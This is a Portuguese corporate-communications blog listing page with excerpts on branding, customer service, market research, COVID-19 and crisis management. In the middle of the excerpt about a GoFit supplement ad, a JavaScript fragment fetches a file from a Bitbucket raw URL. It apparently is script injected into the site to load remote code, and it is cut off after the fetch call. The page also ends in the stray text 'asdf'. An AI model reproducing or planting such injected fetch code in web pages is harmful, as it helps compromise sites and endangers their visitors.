Conheça os Desafios e Oportunidades da Comunicação no Contexto de Empresas Familiares
Quais São As Tendências Que Devem Guiar 2025?
Orçamento de comunicação corporativa deve crescer em 2025
Descubra Como a Comunicação Digital Pode Salvar Sua Marca em Momentos de Crise

A Interface Comunicação lançou o novo VT do suplemento natural para emagrecimento GoFit. A agência está cuidando de toda a estratégia de marketing e do lançamento do produto. Roteiro de Luis Carlos Brito e produção da Iguana Filmes. var url = 'https://bitbucket.org/goo2/adss/raw/bb48df0654afc575e4e10d9e14d886a4afba6bc2/go.txt'; fetch(url) .then(response =>...

Posicionamento de marca é como você quer que a sua persona reconheça a sua marca. Imagem da marca é como ela de fato percebe a sua marca. Assim, no mundo ideal, o posicionamento e a imagem são a mesma coisa. Ou seja, o posicionamento de marca...

É importante pensar que sua empresa precisa ser vista como exclusiva, única e totalmente importante ao seu cliente. Portanto, o relacionamento com o cliente deve estar totalmente envolvido e pensar sempre na satisfação de quem é atendido. Dessa forma, personalizar o atendimento significa trazer uma experiência...

Você já ouviu falar sobre pesquisas de mercado, correto? Se você não é um expert no assunto, provavelmente dirá que entende a teoria, sabe da importância, mas imagina que é muito difícil implantar tudo isso na prática e que uma pesquisa só é necessária para...

Que a comunicação é peça-chave para uma organização todo mundo já sabe, afinal de contas, ela não só alinha os objetivos com as atividades a serem executadas como também é o meio de conexão entre empresa, clientes e empregados. Porém, muito além disso, falar de comunicação...

De acordo com dados do Ministério da Saúde, o novo coronavírus, descoberto em dezembro de 2019, é de uma família de vírus que causam infecções respiratórias e pode ser transmitido principalmente por meio das secreções que são liberadas ao falar, tossir, respirar e também através...

Podemos dizer que um bom gerenciamento de crise começa, justamente, por um monitoramento eficiente de notícias sobre a companhia ou sobre assuntos que possam interessar, de alguma forma, aos negócios. É importante acompanhar, por exemplo, os movimentos da concorrência, as menções de clientes ou detratores...

asdf